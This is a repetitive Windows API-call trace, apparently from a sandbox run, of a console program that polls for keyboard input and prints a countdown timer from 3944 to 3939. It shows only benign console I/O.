[0140.815] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe8
[0140.815] Sleep (dwMilliseconds=0x64)
[0140.946] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0140.946] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe8
[0140.946] Sleep (dwMilliseconds=0x64)
[0141.064] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0141.064] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe8
[0141.064] Sleep (dwMilliseconds=0x64)
[0141.205] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0141.205] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe8
[0141.205] Sleep (dwMilliseconds=0x64)
[0141.345] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0141.345] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe9
[0141.345] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083944") returned 8
[0141.345] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0141.346] __iob_func () returned 0x757a2900
[0141.346] _fileno (_File=0x757a2920) returned 1
[0141.346] _errno () returned 0x5507d8
[0141.346] _get_osfhandle (_FileHandle=1) returned 0x4c
[0141.346] _errno () returned 0x5507d8
[0141.346] GetFileType (hFile=0x4c) returned 0x2
[0141.346] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0141.346] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0141.346] lstrlenW (lpString="\x08\x08\x08\x083944") returned 8
[0141.346] GetConsoleOutputCP () returned 0x1b5
[0141.346] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083944", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0141.346] GetConsoleOutputCP () returned 0x1b5
[0141.346] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083944", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083944", lpUsedDefaultChar=0x0) returned 8
[0141.346] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0141.346] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0141.346] Sleep (dwMilliseconds=0x64)
[0141.485] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0141.485] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe9
[0141.485] Sleep (dwMilliseconds=0x64)
[0141.610] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0141.610] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe9
[0141.610] Sleep (dwMilliseconds=0x64)
[0141.737] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0141.737] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe9
[0141.737] Sleep (dwMilliseconds=0x64)
[0141.852] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0141.852] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe9
[0141.852] Sleep (dwMilliseconds=0x64)
[0141.953] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0141.953] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe9
[0141.953] Sleep (dwMilliseconds=0x64)
[0142.062] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0142.063] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe9
[0142.063] Sleep (dwMilliseconds=0x64)
[0142.173] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0142.173] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe9
[0142.174] Sleep (dwMilliseconds=0x64)
[0142.281] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0142.282] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fea
[0142.282] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083943") returned 8
[0142.282] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0142.282] __iob_func () returned 0x757a2900
[0142.282] _fileno (_File=0x757a2920) returned 1
[0142.282] _errno () returned 0x5507d8
[0142.282] _get_osfhandle (_FileHandle=1) returned 0x4c
[0142.282] _errno () returned 0x5507d8
[0142.282] GetFileType (hFile=0x4c) returned 0x2
[0142.282] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0142.282] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0142.282] lstrlenW (lpString="\x08\x08\x08\x083943") returned 8
[0142.282] GetConsoleOutputCP () returned 0x1b5
[0142.282] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083943", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0142.282] GetConsoleOutputCP () returned 0x1b5
[0142.282] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083943", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083943", lpUsedDefaultChar=0x0) returned 8
[0142.283] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0142.283] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0142.283] Sleep (dwMilliseconds=0x64)
[0142.390] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0142.390] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fea
[0142.390] Sleep (dwMilliseconds=0x64)
[0142.499] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0142.500] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fea
[0142.500] Sleep (dwMilliseconds=0x64)
[0142.609] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0142.609] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fea
[0142.609] Sleep (dwMilliseconds=0x64)
[0142.718] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0142.718] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fea
[0142.718] Sleep (dwMilliseconds=0x64)
[0142.827] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0142.827] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fea
[0142.827] Sleep (dwMilliseconds=0x64)
[0142.936] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0142.936] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fea
[0142.936] Sleep (dwMilliseconds=0x64)
[0143.045] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0143.045] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fea
[0143.045] Sleep (dwMilliseconds=0x64)
[0143.154] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0143.155] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fea
[0143.155] Sleep (dwMilliseconds=0x64)
[0143.279] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0143.280] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5feb
[0143.280] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083942") returned 8
[0143.280] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0143.280] __iob_func () returned 0x757a2900
[0143.280] _fileno (_File=0x757a2920) returned 1
[0143.280] _errno () returned 0x5507d8
[0143.280] _get_osfhandle (_FileHandle=1) returned 0x4c
[0143.280] _errno () returned 0x5507d8
[0143.280] GetFileType (hFile=0x4c) returned 0x2
[0143.280] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0143.280] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0143.280] lstrlenW (lpString="\x08\x08\x08\x083942") returned 8
[0143.280] GetConsoleOutputCP () returned 0x1b5
[0143.280] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083942", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0143.281] GetConsoleOutputCP () returned 0x1b5
[0143.281] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083942", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083942", lpUsedDefaultChar=0x0) returned 8
[0143.281] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0143.281] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0143.281] Sleep (dwMilliseconds=0x64)
[0143.388] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0143.389] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5feb
[0143.389] Sleep (dwMilliseconds=0x64)
[0143.498] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0143.498] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5feb
[0143.498] Sleep (dwMilliseconds=0x64)
[0143.607] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0143.607] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5feb
[0143.607] Sleep (dwMilliseconds=0x64)
[0143.716] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0143.716] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5feb
[0143.716] Sleep (dwMilliseconds=0x64)
[0143.841] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0143.841] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5feb
[0143.841] Sleep (dwMilliseconds=0x64)
[0143.950] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0143.950] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5feb
[0143.950] Sleep (dwMilliseconds=0x64)
[0144.059] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0144.059] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5feb
[0144.059] Sleep (dwMilliseconds=0x64)
[0144.168] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0144.169] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5feb
[0144.169] Sleep (dwMilliseconds=0x64)
[0144.278] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0144.281] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fec
[0144.281] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083941") returned 8
[0144.281] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0144.281] __iob_func () returned 0x757a2900
[0144.281] _fileno (_File=0x757a2920) returned 1
[0144.281] _errno () returned 0x5507d8
[0144.281] _get_osfhandle (_FileHandle=1) returned 0x4c
[0144.281] _errno () returned 0x5507d8
[0144.281] GetFileType (hFile=0x4c) returned 0x2
[0144.281] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0144.281] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0144.281] lstrlenW (lpString="\x08\x08\x08\x083941") returned 8
[0144.282] GetConsoleOutputCP () returned 0x1b5
[0144.282] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083941", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0144.282] GetConsoleOutputCP () returned 0x1b5
[0144.282] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083941", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083941", lpUsedDefaultChar=0x0) returned 8
[0144.282] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0144.282] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0144.282] Sleep (dwMilliseconds=0x64)
[0144.387] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0144.387] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fec
[0144.387] Sleep (dwMilliseconds=0x64)
[0144.527] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0144.528] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fec
[0144.528] Sleep (dwMilliseconds=0x64)
[0144.668] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0144.668] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fec
[0144.668] Sleep (dwMilliseconds=0x64)
[0144.778] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0144.778] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fec
[0144.778] Sleep (dwMilliseconds=0x64)
[0144.924] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0144.924] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fec
[0144.924] Sleep (dwMilliseconds=0x64)
[0145.043] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0145.043] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fec
[0145.043] Sleep (dwMilliseconds=0x64)
[0145.185] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0145.185] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fec
[0145.185] Sleep (dwMilliseconds=0x64)
[0145.323] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0145.323] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fed
[0145.323] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083940") returned 8
[0145.323] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0145.323] __iob_func () returned 0x757a2900
[0145.323] _fileno (_File=0x757a2920) returned 1
[0145.323] _errno () returned 0x5507d8
[0145.323] _get_osfhandle (_FileHandle=1) returned 0x4c
[0145.323] _errno () returned 0x5507d8
[0145.324] GetFileType (hFile=0x4c) returned 0x2
[0145.324] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0145.324] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0145.324] lstrlenW (lpString="\x08\x08\x08\x083940") returned 8
[0145.324] GetConsoleOutputCP () returned 0x1b5
[0145.324] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083940", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0145.324] GetConsoleOutputCP () returned 0x1b5
[0145.324] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083940", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083940", lpUsedDefaultChar=0x0) returned 8
[0145.324] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0145.324] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0145.324] Sleep (dwMilliseconds=0x64)
[0145.463] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0145.464] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fed
[0145.464] Sleep (dwMilliseconds=0x64)
[0145.575] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0145.575] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fed
[0145.575] Sleep (dwMilliseconds=0x64)
[0145.697] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0145.697] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fed
[0145.697] Sleep (dwMilliseconds=0x64)
[0145.806] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0145.807] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fed
[0145.807] Sleep (dwMilliseconds=0x64)
[0145.931] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0145.931] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fed
[0145.932] Sleep (dwMilliseconds=0x64)
[0146.072] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0146.072] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fed
[0146.072] Sleep (dwMilliseconds=0x64)
[0146.212] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0146.212] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fed
[0146.212] Sleep (dwMilliseconds=0x64)
[0146.353] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0146.353] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fee
[0146.353] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083939") returned 8
[0146.353] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0146.353] __iob_func () returned 0x757a2900
[0146.353] _fileno (_File=0x757a2920) returned 1
[0146.353] _errno () returned 0x5507d8
[0146.353] _get_osfhandle (_FileHandle=1) returned 0x4c
[0146.353] _errno () returned 0x5507d8
[0146.353] GetFileType (hFile=0x4c) returned 0x2
[0146.353] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0146.353] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0146.353] lstrlenW (lpString="\x08\x08\x08\x083939") returned 8
[0146.354] GetConsoleOutputCP () returned 0x1b5
[0146.354] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083939", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0146.354] GetConsoleOutputCP () returned 0x1b5
[0146.354] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083939", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083939", lpUsedDefaultChar=0x0) returned 8
[0146.354] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0146.354] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0146.354] Sleep (dwMilliseconds=0x64)
[0146.462] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0146.462] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fee
[0146.462] Sleep (dwMilliseconds=0x64)
[0146.571] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0146.571] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fee
[0146.571] Sleep (dwMilliseconds=0x64)
[0146.680] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0146.680] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fee
[0146.680] Sleep (dwMilliseconds=0x64)
[0146.790] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0146.790] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fee
[0146.790] Sleep (dwMilliseconds=0x64)
